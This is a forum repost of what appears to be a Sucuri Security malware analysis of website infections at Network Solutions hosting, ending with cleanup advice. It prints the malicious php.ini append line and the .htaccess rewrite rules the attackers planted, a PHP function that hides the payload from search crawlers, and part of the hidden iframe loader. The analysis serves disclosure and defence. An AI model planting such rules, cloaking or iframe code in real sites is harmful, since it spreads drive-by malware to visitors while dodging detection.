Jump to content
begood

New infections today at Network Solutions

By begood, in Stiri securitate

Recommended Posts

begood Newbie

begood

Posted
Posted

Update: We just heard back from Network solutions and they explained the issue to us. It is also related to the US Treasury Department hack, because they are hosting at Netsol and got infected too.

On their own words: "This past weekend, an application that we support on our hosting platform was exploited as we were in the process of fixing it. We believe we have fixed the issue and we were able to contain the number of potentially affected websites to less than 250."

So the problem seems to be fixed and only 250 sites got hacked. Not too bad for a company of their size.

I also have to point out that Network Solutions response to this (and to the previous) incident was very good. They took responsibility, kept everyone updated and worked hard to fix the sites involved. There is never going to be a perfect secure hosting solution (bugs happen), but being able to respond quickly is what we always want to see.

Yes, I am tired of reporting those as you are probably tired of hearing them as well. But today we got reports from multiple site owners of new infections at Network Solutions. Some of them were using Wordpress, but some were not. So nobody can blame Wordpress this time.

In fact, we just finished fixing a few of these sites and we have some info to share.

*btw, some of them were hacked on the previous batch, but some were not. No correlation here.

**I am not 100% sure of how this is happening. Different sites, different platforms, most of them updated. The only thing weird is that their cgi-bin had the drwxrws--x (suid bit checked). I will post an update when I get more info.

Attack analysis

This attack is happening in two ways:

1- A new php.ini is created inside the cgi-bin directory. It looks like this:

auto_append_file = /data/xx/yy//user/abc/cgi-bin/root

2- A new .htaccess is created (or modified) to load a new php file:

RewriteRule ^(.*)\.html$ /data/xx/user/yy/htdocs/file.php [L]

RewriteRule ^(.*)\.htm$ /data/xx/user/yy/htdocs/file.php [L]

Note that I am hiding the original paths to protect the innocent. Also, the "file.php" from the second case had different file names on each case.

The "root" file inside the cgi-bin looks like the "counter.cgi" that we saw previously.

The file.php is very interesting and you can see the full content here: http://sucuri.net/malware/MW:GREPADD:2. It not only checks if the request is coming from a bot, but also the operating system (Linux, FreeBSD, etc) and only displays the malware on certain cases:

function detect_os() {

global $os;

$user_agent = $_SERVER['HTTP_USER_AGENT'];

if ((eregi("Google", $user_agent))

or (eregi("gsa-crawler", $user_agent))

or (eregi("Yahoo", $user_agent))

or (eregi("msnbot", $user_agent))

or (eregi("Turtle", $user_agent))

or (eregi("Yandex", $user_agent))

or (eregi("YaDirectBot", $user_agent))

or (eregi("Rambler", $user_agent))

or (eregi("James Bond", $user_agent))

or (eregi("Ask Jeeves", $user_agent))

or (eregi("Baiduspider", $user_agent))

or (eregi("EltaIndexer", $user_agent))

or (eregi("GameSpyHTTP", $user_agent))

or (eregi("grub-client", $user_agent))

or (eregi("Slurp", $user_agent))

or (eregi("Pagebull", $user_agent))

or (eregi("Scooter", $user_agent))

or (eregi("Nutch", $user_agent))

or (eregi("Zeus", $user_agent))

or (eregi("WebAlta", $user_agent))

or (eregi("Wget", $user_agent))

or (eregi("bot", $user_agent))

or (eregi("ia_archiver", $user_agent)))

{$os = "Bots";}

elseif (ereg("Windows 95", $user_agent)) $os = "Windows 95";

elseif (ereg("Windows NT 4", $user_agent)) $os = "Windows NT 4";

elseif (ereg("Windows 98", $user_agent)) $os = "Windows 98";

elseif (ereg("Win 9x 4.9", $user_agent)) $os = "Windows ME";

elseif (ereg("Windows NT 5.0", $user_agent)) $os = "Windows 2000";

elseif (ereg("Windows NT 5.1", $user_agent)) $os = "Windows XP";

elseif (ereg("Windows NT 5.2", $user_agent)) $os = "Windows 2003";

elseif (ereg("Windows NT 6.0", $user_agent)) $os = "Windows Vista";

elseif (ereg("Windows NT 6.1", $user_agent)) $os = "Windows 7";

elseif (ereg("Windows CE", $user_agent)) $os = "Windows CE";

elseif (ereg("iPhone", $user_agent)) $os = "iPhone OS";

elseif (ereg("Symbian", $user_agent)) $os = "Symbian OS";

elseif (ereg("Linux", $user_agent)) $os = "Linux";

elseif (ereg("SunOS", $user_agent)) $os = "SunOS";

elseif (ereg("FreeBSD", $user_agent)) $os = "FreeBSD";

elseif (ereg("NetBSD", $user_agent)) $os = "NetBSD";

elseif (ereg("PPC;", $user_agent)) $os = "Pocket PC";

elseif ((ereg("PPC", $user_agent)) or (eregi("Mac_PowerPC", $user_agent))) $os = "Power PC";

elseif (ereg("Mac OS", $user_agent)) $os = "Mac OS";

elseif (eregi("PlayStation", $user_agent)) $os = "PlayStation";

elseif (ereg("Nintendo Wii", $user_agent)) $os = "Nintendo Wii";

elseif (ereg("Nitro", $user_agent)) $os = "Nintendo DS";

elseif (ereg("J2ME/MIDP", $user_agent)) $os = "Mobile phone";

else $os = "Unknown OS :(";

At the end both show the same iframe to load malware:

document.write('<iframe frameborder="0" onload=\'

if (!this.src){ this.src="
"; this.height=0; this.width=0;} \'

If you got infected, look at your php.ini or .htaccess file and remove the bad entries. If you are not sure, use our scanner to check it out.

Sucuri Security: New infections today at Network Solutions

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...